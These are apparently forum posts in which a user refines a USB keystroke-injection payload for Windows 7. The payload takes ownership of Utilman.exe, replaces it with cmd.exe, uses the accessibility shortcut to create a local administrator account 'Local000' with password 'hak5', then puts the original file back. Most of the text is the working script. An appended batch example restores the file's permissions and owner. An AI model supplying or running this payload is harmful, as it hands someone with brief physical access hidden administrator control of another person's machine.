mackwage

Posts posted by mackwage

  1. Thanks for the tip on the default delay.

    I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.

    icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

    This command didn't actually seem to change the permissions unless I added "/grant administrators:F /T". I did some Google searching on the command to understand more about how it works, which led to me adding the last part.

    STRING xcopy cmd.exe util\

    I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.

    STRING cd util

    STRING ren cmd.exe Utilman.exe

    STRING cd ..

    I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.

    STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

    I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.

    STRING rmdir /s /q util

    Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it.

    I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P

  2. Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows 7, specifically the icacls, ren, and rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands, so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.

    DELAY 200

    GUI r

    DELAY 50

    STRING cmd

    DELAY 50

    ENTER

    DELAY 50

    STRING takeown /f "%systemroot%\System32\Utilman.exe"

    ENTER

    DELAY 50

    STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

    ENTER

    DELAY 50

    STRING cd %systemroot%\System32

    ENTER

    DELAY 50

    STRING mkdir util

    ENTER

    STRING xcopy cmd.exe util\

    ENTER

    DELAY 50

    STRING ren Utilman.exe Utilman.exe.bak

    ENTER

    DELAY 50

    STRING cd util

    ENTER

    DELAY 50

    STRING ren cmd.exe Utilman.exe

    ENTER

    DELAY 50

    STRING cd ..

    ENTER

    DELAY 50

    STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

    ENTER

    DELAY 50

    STRING rmdir /s /q util

    ENTER

    DELAY 50

    STRING exit

    ENTER

    DELAY 50

    GUI u

    DELAY 50

    STRING net user Local000 /add

    ENTER

    DELAY 50

    STRING net localgroup administrators Local000 /add

    ENTER

    DELAY 50

    STRING exit

    ENTER

    DELAY 50

    GUI r

    DELAY 50

    STRING cmd

    ENTER

    DELAY 50

    STRING cd "%systemroot%\System32"

    ENTER

    DELAY 50

    STRING del Utilman.exe

    ENTER

    DELAY 50

    STRING ren Utilman.exe.bak Utilman.exe

    ENTER

    DELAY 50

    STRING exit

    ENTER

    GUI r

    DELAY 500

    STRING cmd

    DELAY 500

    ENTER

    DELAY 200

    STRING net user Local000 *

    ENTER

    STRING hak5

    ENTER

    STRING hak5

    ENTER

    STRING exit

    ENTER
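
Both posts above take ownership of Utilman.exe and grant Administrators full control before the swap, and the first post asks for the icacls command that puts the file back to its defaults at the end. The batch script below is an added example, not code from either post or from the Hak5 payload: it snapshots the file's ACL with icacls /save before anything is changed, then restores that ACL and hands ownership back to TrustedInstaller once the swap is undone. It assumes an elevated cmd.exe (takeown and /setowner need the Administrators privileges), the backup path under %TEMP% is chosen for illustration, and the rename/copy steps from the posts are left out where the comment marks them.

```batch
@echo off
setlocal
REM Added example (not from the original posts): save Utilman.exe's ACL before
REM the swap, restore ACL and owner afterwards.
REM Assumptions: elevated cmd.exe; backup file location is illustrative; the
REM stock owner of System32 binaries is "NT SERVICE\TrustedInstaller" and
REM Administrators hold only read-and-execute (RX) on them.

set "TARGET=%systemroot%\System32\Utilman.exe"
set "ACLBACKUP=%TEMP%\utilman-acl.txt"

echo [*] Saving the current ACL of %TARGET%
REM /save writes the DACL of each matching file as SDDL, keyed by the file
REM name relative to the directory that is later handed to /restore.
icacls "%TARGET%" /save "%ACLBACKUP%" || goto :fail

echo [*] Taking ownership and granting Administrators full control
takeown /f "%TARGET%" || goto :fail
REM /T only recurses into directories; on a single file it is harmless but
REM does nothing, so it is omitted here.
icacls "%TARGET%" /grant Administrators:F || goto :fail

REM ... the rename/copy steps from the posts go here, and are undone again
REM     before the restore below ...

echo [*] Restoring the saved ACL
REM /restore takes the DIRECTORY containing the file named in the backup.
icacls "%systemroot%\System32" /restore "%ACLBACKUP%" || goto :fail

echo [*] Handing ownership back to TrustedInstaller
REM Setting another principal as owner needs SeRestorePrivilege, which an
REM elevated Administrators token has.
icacls "%TARGET%" /setowner "NT SERVICE\TrustedInstaller" || goto :fail

echo [*] Result (compare against an untouched System32 binary such as cmd.exe):
icacls "%TARGET%"
dir /q "%TARGET%" | findstr /i "Utilman.exe"
del "%ACLBACKUP%"
exit /b 0

:fail
echo [!] A step failed (errorlevel %errorlevel%); ACL backup kept at %ACLBACKUP%
exit /b 1
```

The order at the end matters: restore the DACL while Administrators still own the file (owners always keep WRITE_DAC), and only then change the owner. If no backup was taken, `icacls "%systemroot%\System32\Utilman.exe" /grant:r Administrators:RX` replaces the explicit full-control grant with the default read-and-execute entry, and the /setowner line still applies; the `dir /q` output should then show `NT SERVICE\TrustedInstaller` as the owner, matching cmd.exe next to it.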
